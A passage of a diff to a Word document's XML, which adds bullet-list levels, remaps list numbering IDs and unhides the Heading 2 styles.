+        <w:ind w:left="2160" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="2880"/>
+        </w:tabs>
+        <w:ind w:left="2880" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="3600"/>
+        </w:tabs>
+        <w:ind w:left="3600" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="4320"/>
+        </w:tabs>
+        <w:ind w:left="4320" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="5040"/>
+        </w:tabs>
+        <w:ind w:left="5040" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="5760"/>
+        </w:tabs>
+        <w:ind w:left="5760" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="6480"/>
+        </w:tabs>
+        <w:ind w:left="6480" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+  </w:abstractNum>
   <w:num w:numId="1" w16cid:durableId="1815027789">
+    <w:abstractNumId w:val="7"/>
+  </w:num>
+  <w:num w:numId="2" w16cid:durableId="1239317583">
     <w:abstractNumId w:val="5"/>
   </w:num>
-  <w:num w:numId="2" w16cid:durableId="1239317583">
-    <w:abstractNumId w:val="3"/>
-  </w:num>
   <w:num w:numId="3" w16cid:durableId="1371303013">
-    <w:abstractNumId w:val="7"/>
+    <w:abstractNumId w:val="10"/>
   </w:num>
   <w:num w:numId="4" w16cid:durableId="1591541990">
-    <w:abstractNumId w:val="1"/>
+    <w:abstractNumId w:val="2"/>
   </w:num>
   <w:num w:numId="5" w16cid:durableId="1790541646">
-    <w:abstractNumId w:val="6"/>
+    <w:abstractNumId w:val="8"/>
   </w:num>
   <w:num w:numId="6" w16cid:durableId="1020854516">
-    <w:abstractNumId w:val="2"/>
+    <w:abstractNumId w:val="3"/>
   </w:num>
   <w:num w:numId="7" w16cid:durableId="1916090426">
     <w:abstractNumId w:val="0"/>
   </w:num>
   <w:num w:numId="8" w16cid:durableId="1054809968">
+    <w:abstractNumId w:val="6"/>
+  </w:num>
+  <w:num w:numId="9" w16cid:durableId="1945846685">
     <w:abstractNumId w:val="4"/>
+  </w:num>
+  <w:num w:numId="10" w16cid:durableId="349065524">
+    <w:abstractNumId w:val="1"/>
+  </w:num>
+  <w:num w:numId="11" w16cid:durableId="444346235">
+    <w:abstractNumId w:val="9"/>
   </w:num>
 </w:numbering>
 </file>
@@ -8678,7 +16621,6 @@
     <w:next w:val="Normal"/>
     <w:link w:val="Heading2Char"/>
     <w:uiPriority w:val="9"/>
-    <w:semiHidden/>
     <w:unhideWhenUsed/>
     <w:qFormat/>
     <w:rsid w:val="00426842"/>
@@ -8893,7 +16835,6 @@
     <w:basedOn w:val="DefaultParagraphFont"/>
     <w:link w:val="Heading2"/>
     <w:uiPriority w:val="9"/>
-    <w:semiHidden/>
     <w:rsid w:val="00426842"/>
     <w:rPr>
       <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
